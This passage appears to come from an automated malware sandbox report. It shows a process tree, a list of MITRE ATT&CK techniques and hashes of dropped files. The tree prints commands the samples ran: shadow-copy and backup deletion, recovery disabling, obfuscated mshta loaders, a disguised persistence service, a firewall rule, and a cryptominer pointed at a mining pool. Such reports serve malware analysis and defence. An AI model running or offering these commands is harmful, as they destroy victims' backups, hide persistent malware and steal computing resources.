                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5042.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1256
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\599A.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\599A.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4580
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6C58.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6C58.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4552
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7C18.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7C18.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5756
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\84C4.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\84C4.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4396
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\84C4.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\84C4.exe" -agent 0
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5460
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5824
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:5740
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5264
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4440
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:5060
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2948
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                          wmic shadowcopy delete
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5268
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4380
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5000
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5108
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4984
                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4944
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:5696
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4332
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5532
                                                                                                                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5804
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                  PID:4484
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\27DB.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\27DB.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\27DB.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:6004
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\7526ce03-60e5-4ebd-967f-d9ae3889e9f8\build2.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\7526ce03-60e5-4ebd-967f-d9ae3889e9f8\build2.exe"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4668
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\7526ce03-60e5-4ebd-967f-d9ae3889e9f8\build2.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\7526ce03-60e5-4ebd-967f-d9ae3889e9f8\build2.exe"
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:2468
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7526ce03-60e5-4ebd-967f-d9ae3889e9f8\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:4728
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                  taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                  PID:2644
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                  PID:4708
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2C50.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2C50.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lxixrkwf\
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3152
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lucatvyy.exe" C:\Windows\SysWOW64\lxixrkwf\
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:4388
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" create lxixrkwf binPath= "C:\Windows\SysWOW64\lxixrkwf\lucatvyy.exe /d\"C:\Users\Admin\AppData\Local\Temp\2C50.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5244
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" description lxixrkwf "wifi internet conection"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:5580
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start lxixrkwf
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                                                                                                                • C:\Users\Admin\mqtpbkhd.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\mqtpbkhd.exe" /d"C:\Users\Admin\AppData\Local\Temp\2C50.exe"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nnkfizqi.exe" C:\Windows\SysWOW64\lxixrkwf\
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" config lxixrkwf binPath= "C:\Windows\SysWOW64\lxixrkwf\nnkfizqi.exe /d\"C:\Users\Admin\mqtpbkhd.exe\""
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" start lxixrkwf
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:5224
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2364
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3049.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3049.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5516
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 3049.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3049.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:4404
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                    taskkill /im 3049.exe /f
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:4696
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                    PID:5876
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3904.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3904.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:3880
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\3904.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\3904.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4156
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\3904.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\3904.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4880
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                                                                                                                                                                            sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:4688
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:4708
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                      PID:4704
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRiPt: cLOse ( CrEAteObjECt ( "WscRipt.sHElL" ). rUN ( "CmD /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = ""MZ"" > 66WBQ~Nm.TVY & CoPY /y /B 66WBQ~Nm.TvY + Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S ", 0 , trUe ) )
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                    PID:4712
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = "MZ" > 66WBQ~Nm.TVY &CoPY /y /B 66WBQ~Nm.TvY+Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                          PID:4528
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>66WBQ~Nm.TVY"
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                            PID:5176
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                            regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                              PID:2732
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                        taskkill -Im "3904.exe" /f
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\lxixrkwf\nnkfizqi.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\lxixrkwf\nnkfizqi.exe /d"C:\Users\Admin\mqtpbkhd.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:4352
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5740
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:4360

                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                      File Deletion

                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                      T1107

                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                      Impact

                                                                                                                                                                                                                                                                                                                      Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                      T1490

                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        cecc7db85fff35fa3222d55032cf1c7e

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        e9e9f0a78e83e27045032ceb56e05c9a7bba5c90

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        c734e4de6d3ac773b19f2479bd61576dc506441706c787360cfaa43a77ef1f6d

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        a21994142c71136954a015dca6158ad2966bc3d1b8a6c9fbf40d3fd4767c0b4d95fcc9270aabbd7dadc69c4f14640a60de76e2ac6f9c1aca6b9bfec7378c5377

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\libcurl.dll
                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\libcurlpp.dll
                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                                        SHA512

